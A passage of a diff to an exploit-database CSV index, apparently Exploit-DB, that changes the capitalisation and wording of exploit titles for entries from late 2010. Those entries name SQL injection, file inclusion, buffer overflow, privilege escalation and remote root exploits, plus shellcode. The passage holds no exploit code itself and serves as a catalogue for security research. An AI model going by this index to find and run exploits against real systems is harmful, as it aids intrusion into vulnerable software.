Injection",2010-11-05,FL0RiX,php,webapps,0 -15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment NULL Pointer Deference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 +15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment NULL Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15434,platforms/windows/dos/15434.html,"LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15435,platforms/windows/dos/15435.html,"LeadTools 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Remote Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 -15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Remote Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0 +15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 +15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0 15440,platforms/php/webapps/15440.txt,"Joomla DCNews Component com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0 @@ -13447,7 +13448,7 @@ id,file,description,date,author,platform,type,port 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) - Local File Inclusion",2010-11-08,"ALTBTA ",php,webapps,0 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) - SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 -15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0 +15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0 @@ -13493,7 +13494,7 @@ id,file,description,date,author,platform,type,port 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 -15513,platforms/php/webapps/15513.txt,"Wordpress Event Registration Plugin 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 +15513,platforms/php/webapps/15513.txt,"WordPress Event Registration Plugin 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 15514,platforms/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,windows,dos,0 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0 15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0 @@ -13513,7 +13514,7 @@ id,file,description,date,author,platform,type,port 15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter Mod)",2010-11-15,dookie,windows,local,0 15543,platforms/php/webapps/15543.txt,"Chameleon Social Networking Software - Persistent Cross-Site Scripting",2010-11-15,Dr-mosta,php,webapps,0 15544,platforms/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 - Database File Disclosure",2010-11-15,keracker,asp,webapps,0 -15545,platforms/php/webapps/15545.txt,"Nuked-Klan Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0 +15545,platforms/php/webapps/15545.txt,"Nuked-klaN Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0 15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0 15549,platforms/php/webapps/15549.txt,"Joomla Component (com_alfurqan15x) - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0 15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0 @@ -13522,7 +13523,7 @@ id,file,description,date,author,platform,type,port 15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0 15558,platforms/multiple/dos/15558.html,"Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0 15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 -15560,platforms/php/webapps/15560.txt,"CLANSPHERE 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 +15560,platforms/php/webapps/15560.txt,"ClanSphere 2010.0 Final - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15561,platforms/php/webapps/15561.txt,"CompactCMS 1.4.1 - SQL Injection",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15563,platforms/asp/webapps/15563.txt,"Sitefinity CMS - 'ASP.NET' Arbitrary File Upload",2010-11-17,Net.Edit0r,asp,webapps,0 15564,platforms/php/webapps/15564.txt,"Front Accounting 2.3RC2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 @@ -13530,24 +13531,24 @@ id,file,description,date,author,platform,type,port 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0 -15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 +15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 - (Joomla) Template Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0 15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0 -15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - Buffer Overflow (users.txt) (Egghunter)",2010-11-19,0v3r,windows,local,0 +15575,platforms/windows/local/15575.py,"MiniShare 1.5.5 - Buffer Overflow (users.txt) (Egghunter)",2010-11-19,0v3r,windows,local,0 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 15578,platforms/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps,0 15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow",2010-11-20,LiquidWorm,windows,dos,0 15581,platforms/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption",2010-11-20,LiquidWorm,windows,dos,0 -15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - .NKI File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,windows,dos,0 +15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,windows,dos,0 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Privilege Escalation",2010-11-20,LiquidWorm,windows,local,0 15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0 16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0 15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 -15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation",2010-11-20,webDEViL,windows,local,0 +15589,platforms/windows/local/15589.wsf,"Microsoft Windows Task Scheduler - Privilege Escalation",2010-11-20,webDEViL,windows,local,0 15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - Cross-Site Scripting Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 15614,platforms/php/webapps/15614.html,"Wolf CMS 0.6.0b - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface - Source Code Disclosure",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 @@ -13558,13 +13559,13 @@ id,file,description,date,author,platform,type,port 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15618,platforms/osx/shellcode/15618.c,"OS-X/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15619,platforms/linux/dos/15619.c,"Linux Kernel 2.6.37 - 'setup_arg_pages()' Denial of Service",2010-11-26,"Roland McGrath",linux,dos,0 -15620,platforms/linux/local/15620.sh,"systemtap - Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local,0 +15620,platforms/linux/local/15620.sh,"SystemTap - Privilege Escalation",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 15622,platforms/linux/dos/15622.c,"Linux Kernel 2.6.37 - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 - user agent Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps,0 15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS - Permanent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps,0 -15626,platforms/windows/local/15626.py,"OTSTurntables 1.00.048 - (m3u/ofl) Local Buffer Overflow Exploit (SEH)",2010-11-28,0v3r,windows,local,0 +15626,platforms/windows/local/15626.py,"OtsTurntables 1.00.048 - (m3u/ofl) Local Buffer Overflow Exploit (SEH)",2010-11-28,0v3r,windows,local,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps,0 15628,platforms/windows/dos/15628.py,"Hanso Player 1.4.0 - '.m3u' Denial of Service",2010-11-28,anT!-Tr0J4n,windows,dos,0 15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - search.asp / showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 @@ -13581,12 +13582,12 @@ id,file,description,date,author,platform,type,port 15641,platforms/php/webapps/15641.txt,"Pandora Fms 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow Denial of Service",2011-01-18,"Vuk Ivanovic",windows,dos,0 15642,platforms/php/webapps/15642.txt,"Pandora Fms 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15643,platforms/php/webapps/15643.txt,"Pandora Fms 3.1 - Path Traversal / Local File Inclusion",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15643,platforms/php/webapps/15643.txt,"Pandora Fms 3.1 - Directory Traversal / Local File Inclusion",2010-11-30,"Juan Galiana Lara",php,webapps,0 15644,platforms/php/webapps/15644.txt,"Eclime 1.1.2b - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15645,platforms/php/webapps/15645.txt,"enano CMS 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15647,platforms/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",php,webapps,0 -15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution Exploit",2010-12-01,bz1p,windows,remote,0 +15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0 15649,platforms/windows/dos/15649.pl,"HP Data Protector Manager A.06.11 MMD - NULL Pointer Dereference Denial of Service",2010-12-01,Pepelux,windows,dos,0 15650,platforms/php/webapps/15650.txt,"Alibaba Clone B2B 3.4 - SQL Injection",2010-12-01,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15651,platforms/php/webapps/15651.txt,"OsCSS 1.2 - Arbitrary File Upload",2010-12-01,"Shichemt Alen",php,webapps,0 @@ -13600,12 +13601,12 @@ id,file,description,date,author,platform,type,port 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 - (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 -15663,platforms/windows/local/15663.py,"MediaCoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 +15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0 15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 -15669,platforms/windows/dos/15669.py,"Mediamonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 +15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0 15673,platforms/asp/webapps/15673.txt,"Dejcom Market CMS - 'showbrand.aspx' SQL Injection",2010-12-04,Mormoroth,asp,webapps,0 @@ -13614,12 +13615,12 @@ id,file,description,date,author,platform,type,port 15676,platforms/multiple/dos/15676.txt,"Wireshark - LDSS Dissector Buffer Overflow",2010-12-04,"Nephi Johnson",multiple,dos,0 15677,platforms/asp/webapps/15677.txt,"T-Dreams Cars Ads Package 2.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15678,platforms/asp/webapps/15678.txt,"T-Dreams Job Seekers Package 3.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15679,platforms/asp/webapps/15679.txt,"ASPSiteware Recipe Organizer - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15680,platforms/asp/webapps/15680.txt,"ASPSiteware Project Reporter - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15681,platforms/asp/webapps/15681.txt,"ASPSiteware JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15682,platforms/asp/webapps/15682.txt,"ASPSiteware ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15683,platforms/asp/webapps/15683.txt,"ASPSiteware Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15684,platforms/php/webapps/15684.txt,"Wordpress do_trackbacks() function - SQL Injection",2010-12-05,M4g,php,webapps,0 +15679,platforms/asp/webapps/15679.txt,"ASPSiteWare Recipe ORGanizer - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 +15680,platforms/asp/webapps/15680.txt,"ASPSiteWare Project Reporter - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 +15681,platforms/asp/webapps/15681.txt,"ASPSiteWare JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 +15682,platforms/asp/webapps/15682.txt,"ASPSiteWare ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 +15683,platforms/asp/webapps/15683.txt,"ASPSiteWare Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 +15684,platforms/php/webapps/15684.txt,"WordPress do_trackbacks() function - SQL Injection",2010-12-05,M4g,php,webapps,0 15685,platforms/php/webapps/15685.html,"PHPKF Forum 1.80 - profil_degistir.php Cross-Site Request Forgery Exploit",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller - SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 @@ -13627,26 +13628,26 @@ id,file,description,date,author,platform,type,port 15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0 15690,platforms/asp/webapps/15690.txt,"SOOP Portal 2.0 - Arbitrary File Upload",2010-12-05,Net.Edit0r,asp,webapps,0 15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps,0 -15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - (.vsc) Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 -15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution Exploit",2010-12-06,Rew,windows,local,0 +15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 +15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 15694,platforms/windows/dos/15694.txt,"WinZip 15.0 - WZFLDVW.OCX Text Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 15695,platforms/windows/dos/15695.txt,"WinZip 15.0 - WZFLDVW.OCX IconIndex Property Denial of Service",2010-12-06,"Fady Mohammed Osman",windows,dos,0 -15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution Exploit",2010-12-06,Rew,windows,local,0 +15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 - Safe Search for IE Denial of Service",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess Denial of Service (PoC)",2010-12-06,Dr_IDE,windows,dos,0 15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 -15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote Cross-Site Scripting POST Injection",2010-12-06,LiquidWorm,php,webapps,0 +15701,platforms/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - Remote Cross-Site Scripting POST Injection",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",asp,webapps,0 -15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 +15705,platforms/linux/dos/15705.txt,"GNU InetUtils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 -15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos,0 +15707,platforms/multiple/dos/15707.txt,"WonderWare InBatch 9.0sp1 - Buffer Overflow",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 15744,platforms/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",multiple,webapps,0 -15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion Exploit",2010-12-09,Br0ly,php,webapps,0 +15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,php,webapps,0 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0 @@ -13656,8 +13657,8 @@ id,file,description,date,author,platform,type,port 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0 -15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0 -15803,platforms/windows/dos/15803.py,"Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0 +15723,platforms/freebsd/remote/15723.c,"FreeBSD Litespeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0 +15803,platforms/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC UNAUTH'D Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0 15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - Cross-Site Request Forgery",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -13684,7 +13685,7 @@ id,file,description,date,author,platform,type,port 15754,platforms/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 15755,platforms/php/webapps/15755.txt,"Easy Online Shop - SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 15756,platforms/php/webapps/15756.txt,"MHP Downloadshop - SQL Injection",2010-12-17,"Easy Laster",php,webapps,0 -15758,platforms/win_x86/dos/15758.c,"Windows - Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0 +15758,platforms/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0 15766,platforms/php/webapps/15766.txt,"Radius Manager 3.8.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 15761,platforms/windows/local/15761.txt,"AhnLab V3 Internet Security 8.0 <= 1.2.0.4 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 15762,platforms/windows/local/15762.txt,"NProtect Anti-Virus 2007 <= 2010.5.11.1 - Privilege Escalation",2010-12-17,MJ0011,windows,local,0 @@ -13714,22 +13715,22 @@ id,file,description,date,author,platform,type,port 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0 15791,platforms/php/webapps/15791.txt,"Joomla Component Jotloader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0 -15792,platforms/hardware/dos/15792.php,"Apple iPhone Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 +15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0 -15794,platforms/hardware/dos/15794.php,"Apple iPhone Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 +15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 15795,platforms/php/webapps/15795.txt,"Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0 -15796,platforms/hardware/dos/15796.php,"Apple iPhone Safari - (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 +15796,platforms/hardware/dos/15796.php,"Apple iOS Safari - (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 15797,platforms/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 